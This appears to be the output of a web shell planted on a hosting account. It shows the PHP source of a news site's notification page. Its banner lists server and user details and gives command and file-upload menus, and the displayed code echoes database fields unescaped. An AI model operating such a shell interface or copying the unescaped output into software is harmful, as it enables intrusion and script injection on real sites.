Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/imyrqtmy/public_html/localapp/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include("vendor/inc/config.php"); error_reporting(E_ERROR | E_PARSE); ?> <!doctype html> <html class="no-js" lang="en"> <?php require "inc/head.php"; ?> <body> <!-- Main Wrapper --> <div id="main-wrapper"> <!-- Header Top Start --> <!-- Header Start --> <?php require "inc/header.php"; ?> <!-- Header End --> <!-- Breaking News Section Start --> <div class="breaking-news-section section"> <div class="container"> <div class="row"> <div class="col-12"> <!-- Breaking News Wrapper Start --> <div class="breaking-news-wrapper"> <!-- Breaking News Title --> <h5 class="breaking-news-title float-start">Breaking News</h5> <!-- Breaking Newsticker Start --> <ul class="breaking-news-ticker float-start"> <li><a href="#">Tell me what you today, And i ‘ll tell you who you are!!!</a></li> <li><a href="#">Fashion is about some thing that comes from with in you.</a></li> <li><a href="#">Australia announced squad for Bangladesh tour.</a></li> <li><a href="#">How group of rebel are talking on Banasree epidemic.</a></li> </ul><!-- Breaking Newsticker Start --> <!-- Breaking News Nav --> <div class="breaking-news-nav"> <button class="news-ticker-prev"><i class="fa fa-angle-left"></i></button> <button class="news-ticker-next"><i class="fa fa-angle-right"></i></button> </div> </div><!-- Breaking News Wrapper End --> </div> </div> </div> </div><!-- Breaking News Section End --> <!-- Page Banner Section Start --> <div class="page-banner-section section mt-30 mb-30"> <div class="container"> <div class="row row-1"> <!-- Page Banner Start --> <div class="col-12"> <div class="page-banner" style="background-image: url(img/bg/page-banner-fashion.jpg)"> <h2>Notification</h2> <ol class="page-breadcrumb"> <li><a href="#">Home</a></li> <li class="active">Notification</li> </ol> </div> </div><!-- Page Banner End --> </div> </div> </div><!-- Page Banner Section End --> <!-- Blog Section Start --> <div class="blog-section section"> <div class="container"> <!-- Feature Post Row Start --> <div class="row"> <div class="col-lg-8 col-12 mb-50"> <?php $query = "SELECT * FROM notifications"; $query_run =mysqli_query($conn, $query); if(mysqli_num_rows($query_run) > 0){ foreach($query_run as $row){ ?> <!-- Single Blog Start --> <div class="single-blog mb-50"> <div class="blog-wrap"> <!-- Meta --> <div class="meta fix"> <span class="meta-item date"><i class="fa fa-clock-o"></i><?php echo date("d F Y", strtotime($row['created_at'])); ?></span> </div> <!-- Title --> <h3 class="title"><a href="#"><?php echo $row['notification_title']; ?></a></h3> <!-- Image --> <a href="#" class="image"><img src="<?php echo "admin/notification/" . $row['photo']; ?>" alt="post"></a> <!-- Content --> <div class="content"> <!-- Description --> <p><?php echo $row['description']; ?></p> <!-- Read More --> <!-- <a href="blog-details.html" class="read-more">continue reading</a> --> </div> </div> </div> <?php }} ?> <!-- Single Blog End --> <!-- Single Blog Start --> <!-- <div class="single-blog mb-50"> <div class="blog-wrap"> <div class="meta fix"> <a href="#" class="meta-item category sports">sports</a> <a href="#" class="meta-item author"><img src="img/post/post-author-1.jpg" alt="post author">Sathi Bhuiyan</a> <span class="meta-item date"><i class="fa fa-clock-o"></i><?php echo date("d F Y", strtotime($row['created_at'])); ?></span> </div> <h3 class="title"><a href="blog-details.html">Breastsstroke Master become history marker.</a></h3> <a href="blog-details.html" class="image"><img src="img/post/post-154.png" alt="post"></a> <div class="content"> <p>There are many variations of passages of have suffered alteration in some form, by injected humour, or randomised words which don't look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn't anything embarrassing hidden in the middle of text. All the Lorem Ipsum generators. <br> On the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.</p> <a href="blog-details.html" class="read-more">continue reading</a> </div> </div> </div> --> <!-- <div class="single-blog mb-50"> <div class="blog-wrap"> <div class="meta fix"> <a href="#" class="meta-item category gadgets">gadgets</a> <a href="#" class="meta-item author"><img src="img/post/post-author-1.jpg" alt="post author">Sathi Bhuiyan</a> <span class="meta-item date"><i class="fa fa-clock-o"></i><?php echo date("d F Y", strtotime($row['created_at'])); ?></span> </div> <h3 class="title"><a href="blog-details.html">Explore the new world with new technology.</a></h3> <a href="blog-details.html" class="image"><img src="img/post/post-155.jpg" alt="post"></a> <div class="content"> <p>There are many variations of passages of have suffered alteration in some form, by injected humour, or randomised words which don't look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn't anything embarrassing hidden in the middle of text. All the Lorem Ipsum generators. <br> On the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.</p> <a href="blog-details.html" class="read-more">continue reading</a> </div> </div> </div> --> <!-- <div class="page-pagination-2 text-center"> <ul> <li><a href="#"><i class="fa fa-angle-left"></i></a></li> <li class="active"><a href="#">1</a></li> <li><a href="#">2</a></li> <li><a href="#">3</a></li> <li><a href="#"><i class="fa fa-angle-right"></i></a></li> </ul> </div> --> </div> </div><!-- Feature Post Row End --> </div> </div><!-- Blog Section End --> <!-- Instagram Section Start --> <!-- Footer Top Section Start --> <!-- Footer Top Section End --> <!-- Footer Bottom Section Start --> </div> <!-- JS ============================================ --> <!-- jQuery JS --> <script src="js/vendor/jquery-3.6.0.min.js"></script> <script src="js/vendor/jquery-migrate-3.3.2.min.js"></script> <!-- Bootstrap JS --> <script src="js/bootstrap.bundle.min.js"></script> <!-- Plugins JS --> <script src="js/plugins.js"></script> <!-- ycp JS --> <script src="js/ycp.js"></script> <!-- Main JS --> <script src="js/main.js"></script> </body> </html>